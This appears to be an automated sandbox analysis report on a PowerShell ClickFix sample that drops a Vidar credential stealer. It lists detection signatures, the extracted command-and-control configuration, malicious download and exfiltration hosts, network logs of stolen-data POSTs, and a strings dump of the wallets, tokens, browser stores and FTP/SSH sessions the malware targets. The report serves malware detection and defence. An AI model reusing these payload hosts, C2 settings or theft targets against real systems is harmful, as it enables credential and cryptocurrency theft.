Windows Analysis Report
runner.txt.ps1

Overview

General Information

Sample name: runner.txt.ps1
Analysis ID: 1597978
MD5: 98ff64416ca81ce3926e59b0b094c7cf
SHA1: 26d87254b5ebecb505c4ba7bbcfc1e0b966096bf
SHA256: 689afb138cce81a04a517539d0b927bfd5ac8a3eb70bef2bb435d4c6b2a0b40e
Tags: ClickFixFakeCaptchaps1vidaruser-aachum
Infos:

Detection

ReverseShell, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected ReverseShell
Yara detected Vidar stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Powershell drops PE file
Searches for specific processes (likely to inject)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: https://tlfiyat.shop/ Avira URL Cloud: Label: malware
Source: https://lapkimeow.icu/run Avira URL Cloud: Label: malware
Source: http://lapkimeow.icu Avira URL Cloud: Label: malware
Source: https://lapkimeow.icu Avira URL Cloud: Label: malware
Source: 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree, 8_2_00405FE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree, 8_2_0040E7E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey, 8_2_00406062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040627F LocalAlloc,BCryptDecrypt, 8_2_0040627F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 8_2_0040609C
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.64.30.238:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:54593 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:54595 version: TLS 1.2
Source: Binary string: vdr1.pdb source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005167000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2338297789.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005167000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2338297789.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wReserved3..?.@.......bVal..?.@.......iVal..?.@.......lVal..?.@.......fltVal..?.@.......dblVal..X.@.......vbool..@.@.......scode..?.@.......cyVal..?.@.......date....@.......bstrVal....@.......unkVal....@.......dispVal... D.......parray............pbVal............piVal............plVal............pfltVal............pdblVal............pbool............pscode............pcyVal............pdate............pbstrVal............punkVal............pdispVal............pparray..?+@.......pvarVal....@.......byRef..0.@.......cVal..?.@.......uiVal..?.@.......ulVal....@.......llVal..4.@.......ullVal..?.@.......intVal..?.@.......uintVal..?"D.......pdecVal..?.@.......pcVal..?DA.......puiVal..4+@.......pulVal..4+@.......pintVal..?+@.......puintVal............pllVal............pullVal....@.......pvRecord....@. source: powershell.exe, 00000000.00000002.1932226381.0000023DEF539000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEFFCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEEAA5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: s4xltbnq.rm5.exe, 00000004.00000002.2333750743.0000000007020000.00000004.08000000.00040000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000003.2232408165.000000000535D000.00000004.00000800.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2301833999.0000000005118000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.pdb source: powershell.exe, 00000000.00000002.1830624059.0000023DDDCE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.pdbhPo source: powershell.exe, 00000000.00000002.1830624059.0000023DDE577000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00413C71 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, 8_2_00413C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_004112E8 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 8_2_004112E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, 8_2_00407891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, 8_2_0040A69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 8_2_00408776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00411D33 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 8_2_00411D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, 8_2_004013DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 8_2_00406784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00412BBE wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 8_2_00412BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 8_2_00409C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 8_2_00408224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0041269A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 8_2_0041269A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00411883 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 8_2_00411883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4x nop then jmp 0762104Ch 4_2_07620E33
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4x nop then jmp 0762104Ch 4_2_07620E38
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4x nop then jmp 07620AA0h 4_2_076206A3
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4x nop then jmp 07620AA0h 4_2_076206A8
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4x nop then jmp 07693E38h 4_2_07693D79
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4x nop then jmp 07693E38h 4_2_07693D80
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_076AD3C0
Source: chrome.exe Memory has grown: Private usage: 0MB later: 44MB

Networking

barindex
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:54623 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54643 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54650 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54714 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:54601 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54749 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54725 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54725 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.209.106:443 -> 192.168.2.4:54623
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54769 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54769 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54755 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54755 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54778 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54778 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54741 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54741 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.209.106:443 -> 192.168.2.4:54633
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54733 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54733 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54762 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54762 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54798 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54798 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54785 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:54785 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:54824 -> 5.75.209.106:443
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199819539662
Source: global traffic TCP traffic: 192.168.2.4:54590 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 185.199.111.133:443
Source: Network traffic Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.111.133:443 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 34.160.111.145:443
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 217.20.57.34
Source: unknown TCP traffic detected without corresponding DNS query: 217.20.57.34
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 8_2_00403C79
Source: global traffic HTTP traffic detected: GET /SashaP20/Get-Doctor/refs/heads/main/unins000.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ifconfig.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: tlfiyat.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: ifconfig.me
Source: global traffic DNS traffic detected: DNS query: lapkimeow.icu
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tlfiyat.shop
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
